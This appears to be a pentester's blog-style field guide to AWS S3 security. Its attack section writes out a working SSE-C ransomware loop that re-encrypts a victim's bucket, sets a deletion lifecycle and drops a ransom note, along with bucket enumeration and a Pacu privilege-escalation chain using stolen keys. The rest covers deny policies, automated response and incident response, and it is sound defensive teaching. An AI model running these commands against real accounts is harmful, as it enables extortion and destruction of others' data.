AWS S3 Security Field Guide

Vinay Varma

Let's talk about something that keeps me up at night: AWS S3 buckets. If you're in security, you know these things are everywhere. They're storing everything from startup MVPs to Fortune 500’s most valuable data. And they're getting hammered by threat actors in ways we didn't see coming even six months ago.

I've been pentesting AWS environments for years, and the game has completely changed. We're not just dealing with public buckets anymore (though those are still embarrassingly common). The latest attacks, like the Codefinger ransomware campaign, are using AWS's own Server-Side Encryption with Customer-Provided Keys (SSE-C) to lock companies out of their own data. No vulnerability exploitation needed: just stolen credentials and AWS's own features turned into attack vectors.

This guide walks through both sides of the battlefield. I'll show you exactly how attackers are breaking in (with the actual commands and tools), and then flip the script to show you how to lock things down properly. This is what's happening right now in the wild.

Part 1: The Attack Side - How S3 Buckets Get Owned

The New Ransomware Playbook

Let's start with the scariest development of 2025. The Codefinger group discovered they could use SSE-C to encrypt S3 data with their own AES-256 keys, and AWS only logs an HMAC of the key, not the key itself. Once they encrypt your data, it's gone. There's literally no recovery without paying the ransom.

Here's how the attack actually works:

# Step 1: Attacker gets your AWS keys (phishing, exposed in code, etc.)
# Step 2: They enumerate your buckets
aws s3 ls --profile stolen-creds

# Step 3: Download and re-encrypt each file with their key
for file in $(aws s3 ls s3://victim-bucket --recursive | awk '{print $4}'); do
    # Download the file
    aws s3 cp s3://victim-bucket/$file /tmp/temp-file

    # Re-upload with attacker's encryption key
    aws s3 cp /tmp/temp-file s3://victim-bucket/$file \
        --sse-c AES256 \
        --sse-c-key [32-byte-key-attacker-controls]
done

# Step 4: Set lifecycle policy to delete in 7 days
aws s3api put-bucket-lifecycle-configuration --bucket victim-bucket \
    --lifecycle-configuration file://delete-in-7-days.json

# Step 5: Drop the ransom note
echo "Pay 10 BTC to wallet xyz or lose your data forever" > RANSOM.txt
aws s3 cp RANSOM.txt s3://victim-bucket/

What makes this particularly nasty is that no data leaves AWS. Traditional DLP tools see nothing suspicious; it's all legitimate AWS API calls within your own environment.

Modern Bucket Hunting Techniques

Forget the old "try random bucket names" approach. Modern attackers are way more sophisticated:

DNS-Based Enumeration (The Stealthy Approach)

s3enum Tool

# Using s3enum - doesn't hit AWS APIs directly
# Generate permutations and check via DNS
./s3enum -wordlist company-terms.txt -suffixlist common-suffixes.txt targetcorp
# This checks: targetcorp-dev, targetcorp-prod, targetcorp-backup, etc.
# All through DNS lookups, not AWS API calls

Certificate Transparency Logs

Smart attackers are using CT logs to find S3 buckets:

# Query crt.sh for subdomains
curl -s "https://crt.sh/?q=%25.targetcorp.com&output=json" | \
    jq -r '.[].name_value' | \
    grep -E "s3|bucket|storage" | \
    sort -u

GitHub Goldmine

# Search for exposed bucket names in code
github-dorks -d github.com -t [token] \
    -q "s3.amazonaws.com extension:yml targetcorp"
# Common patterns that leak bucket names:
# - Terraform files
# - Docker configs  
# - CI/CD pipelines
# - JavaScript source maps

Privilege Escalation with Pacu

Pacu is basically the Metasploit of AWS: an exploitation framework designed for post-compromise attacks. Here's a real attack chain I've used in authorized tests:

# Install Pacu
pipx install git+https://github.com/RhinoSecurityLabs/pacu.git

# Start a new session
pacu
> create mybreach

# Import compromised keys
> set_keys
Key alias: pwned-dev
Access key ID: AKIA[...]
Secret key: [...]

# Phase 1: Enumerate everything
> run iam__enum_permissions --all-users
> run aws__enum_account
> run s3__enum

# Phase 2: Look for escalation paths
> run iam__privesc_scan

# Example output might show:
# User 'dev-deploy' can assume role 'ProductionAdmin'
# User 'ci-bot' has iam:CreatePolicyVersion permission

# Phase 3: Exploit the escalation
> run iam__privesc_through_create_policy_version \
    --policy-arn arn:aws:iam::123456789:policy/dev-policy

Pacu can test S3 bucket configurations, establish Lambda backdoors, compromise EC2 instances, and even disrupt CloudTrail and GuardDuty monitoring.

The Supply Chain Attack Vector

Here's something that doesn't get enough attention. Abandoned S3 buckets are a massive problem. I've seen this pattern repeatedly:

  1. Company creates updates.mycompany.com S3 bucket

  2. Hardcodes the URL in their app/documentation

  3. Later migrates away and deletes the bucket

  4. Attacker claims the bucket name (they're globally unique)

  5. Now the attacker controls a trusted endpoint

Real example: An enterprise VPN solution was fetching config from a deleted S3 bucket. An attacker could have owned the entire corporate network just by creating that bucket and serving malicious configs.
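Whether you're attacking or auditing, the check is the same: take every bucket name hardcoded in configs, docs, and DNS records and see whether it still exists. Here's a minimal boto3 sketch of that check; the bucket list is a placeholder for whatever your inventory turns up:

import boto3
from botocore.exceptions import ClientError

# Placeholder inventory: bucket names scraped from configs, docs, CNAMEs, etc.
referenced_buckets = ['mycompany-updates', 'mycompany-legacy-assets']

s3 = boto3.client('s3')

for name in referenced_buckets:
    try:
        s3.head_bucket(Bucket=name)
        print(f"{name}: exists and is reachable with these credentials")
    except ClientError as e:
        code = e.response['Error']['Code']
        if code == '404':
            # The name is unclaimed: anyone can register it and serve content from it
            print(f"{name}: DOES NOT EXIST - dangling reference, reclaim it or remove it")
        elif code == '403':
            print(f"{name}: exists but belongs to another account (or access is denied)")
        else:
            # e.g. 301 = exists but in another region; check manually
            print(f"{name}: got {code}, likely exists elsewhere")

Any name that comes back as not existing is a supply-chain incident waiting to happen: either re-register it yourself or rip the reference out of your code and docs.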

Part 2: The Defense Side - Locking Down Your S3

Priority 1: Block the SSE-C Ransomware Attack

AWS now recommends blocking SSE-C entirely if you don't use it, either through bucket policies or Resource Control Policies (RCPs) at the organization level.

Here's the bucket policy that stops it cold:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenySSECUploads",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::your-bucket/*",
      "Condition": {
        "StringEquals": {
          "s3:x-amz-server-side-encryption-customer-algorithm": "AES256"
        }
      }
    }
  ]
}
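If you'd rather roll that policy out from code than the console, here's a minimal boto3 sketch; the bucket name is a placeholder and the policy mirrors the JSON above:

import json
import boto3

bucket = 'your-bucket'  # placeholder
policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "DenySSECUploads",
        "Effect": "Deny",
        "Principal": "*",
        "Action": "s3:PutObject",
        "Resource": f"arn:aws:s3:::{bucket}/*",
        "Condition": {
            "StringEquals": {
                "s3:x-amz-server-side-encryption-customer-algorithm": "AES256"
            }
        }
    }]
}

s3 = boto3.client('s3')
# Note: put_bucket_policy replaces any existing policy, so merge statements first
s3.put_bucket_policy(Bucket=bucket, Policy=json.dumps(policy))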

For organization-wide protection, create and attach a Resource Control Policy (RCP statements must use "Principal": "*"):

# RCPs must be enabled for the organization first:
# aws organizations enable-policy-type --root-id r-examplerootid --policy-type RESOURCE_CONTROL_POLICY
aws organizations create-policy \
  --name DenySSECUploads \
  --type RESOURCE_CONTROL_POLICY \
  --content '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:PutObject",
      "Resource": "*",
      "Condition": {
        "StringEquals": {
          "s3:x-amz-server-side-encryption-customer-algorithm": "AES256"
        }
      }
    }]
  }'

# Attach it to the org root or an OU (policy ID comes from the create-policy output)
aws organizations attach-policy --policy-id p-examplepolicyid --target-id r-examplerootid

Priority 2: Detection and Response Automation

GuardDuty with S3 Protection and Extended Threat Detection can now detect potential ransomware attempts using SSE-C. But you need to act on those alerts immediately.

Here's a Lambda function that auto-responds to suspicious S3 activity:

import boto3
import json
from datetime import datetime

def lambda_handler(event, context):
    # Parse GuardDuty finding
    finding = json.loads(event['Records'][0]['Sns']['Message'])

    # Keys below assume the GetFindings (PascalCase) shape; findings relayed via
    # EventBridge use camelCase instead ('resource', 'resourceType', 's3BucketDetails')
    if 'S3' in finding['Resource']['ResourceType']:
        bucket_name = finding['Resource']['S3BucketDetails'][0]['Name']

        # Immediate containment
        s3 = boto3.client('s3')

        # 1. Block all public access
        s3.put_public_access_block(
            Bucket=bucket_name,
            PublicAccessBlockConfiguration={
                'BlockPublicAcls': True,
                'IgnorePublicAcls': True,
                'BlockPublicPolicy': True,
                'RestrictPublicBuckets': True
            }
        )

        # 2. Enable versioning (if not already)
        s3.put_bucket_versioning(
            Bucket=bucket_name,
            VersioningConfiguration={'Status': 'Enabled'}
        )

        # 3. Create a snapshot tag for incident response
        s3.put_bucket_tagging(
            Bucket=bucket_name,
            Tagging={
                'TagSet': [
                    {'Key': 'IncidentResponse', 'Value': 'Active'},
                    {'Key': 'Timestamp', 'Value': datetime.utcnow().isoformat()}
                ]
            }
        )

        # 4. Notify security team
        sns = boto3.client('sns')
        sns.publish(
            TopicArn='arn:aws:sns:us-east-1:123456789:security-alerts',
            Subject=f'CRITICAL: S3 Bucket {bucket_name} Under Attack',
            Message=json.dumps(finding, indent=2)
        )

    return {'statusCode': 200}
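Assuming findings already land on an SNS topic (for example via an EventBridge rule that forwards GuardDuty findings), here's a rough sketch of wiring the function up; both ARNs are placeholders:

import boto3

# Placeholder ARNs - substitute your own topic and function
TOPIC_ARN = 'arn:aws:sns:us-east-1:123456789012:guardduty-findings'
FUNCTION_ARN = 'arn:aws:lambda:us-east-1:123456789012:function:s3-auto-contain'

lam = boto3.client('lambda')
sns = boto3.client('sns')

# Allow the SNS topic to invoke the function
lam.add_permission(
    FunctionName=FUNCTION_ARN,
    StatementId='AllowSNSInvoke',
    Action='lambda:InvokeFunction',
    Principal='sns.amazonaws.com',
    SourceArn=TOPIC_ARN,
)

# Subscribe the function to the findings topic
sns.subscribe(TopicArn=TOPIC_ARN, Protocol='lambda', Endpoint=FUNCTION_ARN)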

Priority 3: Preventive Controls That Actually Work

The Complete S3 Hardening Checklist

# 1. Account-level Block Public Access (non-negotiable)
aws s3control put-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) \
  --public-access-block-configuration \
    BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true

# 2. Enable default encryption with KMS (not just AES256)
aws s3api put-bucket-encryption --bucket critical-data \
  --server-side-encryption-configuration '{
    "Rules": [{
      "ApplyServerSideEncryptionByDefault": {
        "SSEAlgorithm": "aws:kms",
        "KMSMasterKeyID": "arn:aws:kms:us-east-1:123456789:key/abc-123"
      }
    }]
  }'

# 3. Enable versioning with MFA delete
aws s3api put-bucket-versioning --bucket critical-data \
  --versioning-configuration Status=Enabled,MFADelete=Enabled \
  --mfa "arn:aws:iam::123456789:mfa/root-user 123456"

# 4. Configure Object Lock for immutability
aws s3api put-object-lock-configuration --bucket critical-data \
  --object-lock-configuration '{
    "ObjectLockEnabled": "Enabled",
    "Rule": {
      "DefaultRetention": {
        "Mode": "GOVERNANCE",
        "Days": 30
      }
    }
  }'

# 5. Enable CloudTrail data events (catches the attacks)
aws cloudtrail put-event-selectors --trail-name security-trail \
  --event-selectors '[{
    "ReadWriteType": "All",
    "IncludeManagementEvents": true,
    "DataResources": [{
      "Type": "AWS::S3::Object",
      "Values": ["arn:aws:s3:::*/*"]
    }]
  }]'
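These settings drift, especially the account-level block, so it's worth re-checking them from code on a schedule. A minimal boto3 sketch, assuming the credentials can call sts and s3control:

import boto3

# Look up the current account, then read its Block Public Access settings
account_id = boto3.client('sts').get_caller_identity()['Account']
s3control = boto3.client('s3control')

# Raises NoSuchPublicAccessBlockConfiguration if it was never set at all
config = s3control.get_public_access_block(AccountId=account_id)['PublicAccessBlockConfiguration']

# All four flags should be True; anything else is drift worth alerting on
for flag, enabled in config.items():
    status = 'OK' if enabled else 'DRIFT - re-enable this'
    print(f"{flag}: {enabled} ({status})")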

The VPC Endpoint Lock (My Personal Favorite)

This completely prevents internet access to your S3 buckets, even with valid credentials:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyAllExceptVPCEndpoint",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:*",
      "Resource": [
        "arn:aws:s3:::sensitive-data",
        "arn:aws:s3:::sensitive-data/*"
      ],
      "Condition": {
        "StringNotEquals": {
          "aws:SourceVpce": "vpce-1234567890abcdef0"
        }
      }
    }
  ]
}
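One caveat before you apply it: that policy denies everyone outside the endpoint, including you in the console and your CI, so roll it out carefully. It also assumes a gateway VPC endpoint for S3 already exists; if you need one, here's a rough boto3 sketch (the VPC ID, route table ID, and region are placeholders):

import boto3

ec2 = boto3.client('ec2', region_name='us-east-1')

# Placeholder IDs - substitute your own VPC and route table(s)
response = ec2.create_vpc_endpoint(
    VpcEndpointType='Gateway',
    VpcId='vpc-0123456789abcdef0',
    ServiceName='com.amazonaws.us-east-1.s3',
    RouteTableIds=['rtb-0123456789abcdef0'],
)

# Plug this ID into the aws:SourceVpce condition in the bucket policy
print(response['VpcEndpoint']['VpcEndpointId'])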

Priority 4: Continuous Security Assessment

Tools like Prowler and ScoutSuite provide continuous compliance monitoring, but you need to customize them for your environment:

# Prowler for automated compliance checks
./prowler aws -g s3 -f us-east-1 --output-formats html json

# Custom check for SSE-C usage (run alongside Prowler)
# Note: object listings don't expose encryption headers, and SSE-C objects
# can't even be HeadObject'ed without the customer key, so the practical
# signal is CloudTrail S3 data events carrying the SSE-C algorithm header.
cat << 'EOF' > checks/custom/check_sse_c_usage.sh
#!/bin/bash
# Assumes CloudTrail S3 data events are delivered to this CloudWatch Logs group
LOG_GROUP="/aws/cloudtrail/security"

events=$(aws logs filter-log-events \
  --log-group-name "$LOG_GROUP" \
  --filter-pattern '{ $.requestParameters.x-amz-server-side-encryption-customer-algorithm = * }' \
  --start-time $(date -u -d '1 day ago' +%s)000 \
  --query 'events[].message' --output text)

if [ ! -z "$events" ]; then
  echo "WARNING: SSE-C uploads seen in the last 24 hours - investigate immediately"
fi
EOF

Part 3: When Things Go Wrong - Incident Response

If you suspect a Codefinger-style attack, here's your immediate response playbook:

# 1. Check for SSE-C usage in CloudTrail
aws logs filter-log-events \
  --log-group-name /aws/cloudtrail/security \
  --filter-pattern '{ $.requestParameters.x-amz-server-side-encryption-customer-algorithm = * }' \
  --start-time $(date -u -d '7 days ago' +%s)000

# 2. Look for mass PutObject operations (PutObject is a data event, so it
#    won't appear in lookup-events; query the CloudTrail log group instead)
aws logs filter-log-events \
  --log-group-name /aws/cloudtrail/security \
  --filter-pattern '{ $.eventName = "PutObject" }' \
  --start-time $(date -u -d '1 day ago' +%s)000 \
  --query 'events[].message' --output json | \
  jq -r '.[] | fromjson | .userIdentity.arn' | sort | uniq -c | sort -rn

# 3. Check for lifecycle policy changes
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=PutBucketLifecycleConfiguration

# 4. If ransomware is confirmed, immediately:
# - Revoke the compromised credentials
# - Enable MFA on all accounts
# - Restore from backups (you have backups, right?)
# - Contact AWS Support (they've seen this before)

Reality

Here's what nobody wants to admit: most S3 breaches happen because of silly mistakes. Not sophisticated zero-days. Not nation-state actors. Just developers who:

  • Commit AWS keys to GitHub

  • Copy/paste overly permissive IAM policies

  • Forget to turn on Block Public Access

  • Never rotate credentials

  • Store backups in the same account with the same permissions

The tools and techniques I've shown you are powerful, but they're not magic. The real problem, as security researcher Johannes Ullrich points out, is that "the AWS customer leaked access credentials". Fix the basics first.

TL;DR

The S3 threat landscape has evolved dramatically. We've gone from worrying about public buckets to dealing with ransomware that uses AWS's own encryption against us. The threat actors are getting more creative, but so are the defenses.

My advice? Assume breach. Build your S3 security like someone already has your credentials (because they might). Use defense in depth: bucket policies, VPC endpoints, encryption, versioning, monitoring, and automated response. Make it so that even with valid credentials, an attacker can't do much damage.

And please, for the love of all that is holy, stop putting AWS keys in your code. Use IAM roles. Use instance profiles. Use anything except long-lived credentials sitting in plaintext.

Stay paranoid, stay patched, and keep those buckets locked down.
